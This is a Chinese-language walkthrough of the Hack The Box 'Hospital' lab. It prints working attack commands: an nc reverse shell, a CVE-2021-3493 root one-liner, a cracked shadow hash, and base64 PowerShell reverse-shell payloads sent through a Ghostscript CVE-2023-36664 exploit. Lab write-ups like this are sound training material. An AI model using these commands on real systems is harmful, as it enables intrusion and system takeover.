扫描靶机
nmap -sC -sV -T4 -Pn 10.10.11.241Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-20 08:37 CSTNmap scan report for 10.10.11.241Host is up (0.39s latency).Not shown: 980 filtered tcp ports (no-response)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-20 07:37:56Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:03443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)|_http-title: Hospital Webmail :: Welcome to Hospital Webmail|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after: 2019-11-08T23:48:47| tls-alpn:|_ http/1.1|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open ldapssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:031801/tcp open msmq?2103/tcp open msrpc Microsoft Windows RPC2105/tcp open msrpc Microsoft Windows RPC2107/tcp open msrpc Microsoft Windows RPC2179/tcp open vmrdp?3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:033269/tcp open globalcatLDAPssl?| ssl-cert: Subject: commonName=DC| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb| Not valid before: 2023-09-06T10:49:03|_Not valid after: 2028-09-06T10:49:033389/tcp open ms-wbt-server Microsoft Terminal Services| rdp-ntlm-info:| Target_Name: HOSPITAL| NetBIOS_Domain_Name: HOSPITAL| NetBIOS_Computer_Name: DC| DNS_Domain_Name: hospital.htb| DNS_Computer_Name: DC.hospital.htb| DNS_Tree_Name: hospital.htb| Product_Version: 10.0.17763|_ System_Time: 2023-11-20T07:39:01+00:00| ssl-cert: Subject: commonName=DC.hospital.htb| Not valid before: 2023-09-05T18:39:34|_Not valid after: 2024-03-06T18:39:348080/tcp open http Apache httpd 2.4.55 ((Ubuntu))|_http-open-proxy: Proxy might be redirecting requests| http-title: Login|_Requested resource was login.php| http-cookie-flags:| /:| PHPSESSID:|_ httponly flag not set|_http-server-header: Apache/2.4.55 (Ubuntu)Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windowsHost script results:| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s| smb2-time:| date: 2023-11-20T07:39:00|_ start_date: N/A
扫描出了很多端口,包括AD常用的88端口,还有smb的445端口,先看看能不能进入smb共享
看来无法进去,扫描出了DC.hospital.htb子域名,都写进去hosts,然后打开一下网站
是一个医院的后台邮件登录网站,也没有新建的用户,猜测只有医院内部人员的登录,先不管,刚刚还扫描到了8080端口
原来这才是公共使用的网站,Make one那里可以新建用户,那就新建一个用户登录
登录进去后,可以发现这是一个上传文件的接口,fuzz一下网站有没有upload的文件夹
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u "http://hospital.htb:8080/FUZZ" --hc 404
果真有一个upload的,上传一个图片,然后是否存在LFI漏洞
确认有LFI漏洞,尝试上传shell,看看能不能给shell
看来要绕过格式限制才能上传,换成phar格式可以成功绕过
然后又出现了一个新的问题
刚刚上传的shell连接被杀了,所以只能换一个方式getshell,上传带GUI的shell
可以很直观的看到网站架构以及root内容
但是无法执行命令,可以使用该项目的shell,直接反弹
https://github.com/flozz/p0wny-shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
成功反弹,然后提权,输入uname查看到内核漏洞,直接使用CVE-2021-3493提权
https://github.com/briskets/CVE-2021-3493/tree/main
或者输入该命令直接提权
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"u/python3 -c 'import os;os.setuid(0);os.system("bash")'拿到人root后可以查看shadow,发现里面有一串hash
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/
然后复制到本地,使用john破解
john --wordlist=/home/uu/rockyou.txt hash
成功爆破出密码,密码是qwe123!@#但是是无法登录靶机的,是用来登录医院的内部后台的
登录进去后可以看到一封邮件
翻译过来后,有两个重要的信息,一个是eps格式,一个是GhostScript可视化,猜测是可以通过发送邮件里面加入eps格式的shell,然后他们会执行,可以使用该项目,同时也得到了drbrown用户
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
首先生成一个普通的eps文件
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.14.3 -port 443 --filename caixukun --extension eps然后再使用该工具往这文件里注入shell
python3 CVE_2023_36664_exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --filename caixukun.eps
过一段时候,autobot会自动执行
成功拿到user flag:0e1153bb58625501c1a1755d0f35d4cc
回到c盘底下有个xampp文件夹
进去后有个htbdocs
使用icacls命令查看权限
用户是NT AUTHORITYSYSTEM权限,所以可以理解,假如医院内部网站getshell了,就直接拿到了NT AUTHORITYSYSTEM权限,所以在该文件夹加入shell,然后反弹
该GUI的shell可以在kali自带的webshells文件夹里面的php可以找到,将shell用base64编码发送
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
成功拿到root flag:64161bc57442f6e0447be4c68dc8a9fe
原文始发于微信公众号(Jiyou too beautiful):HTB-Hospital笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论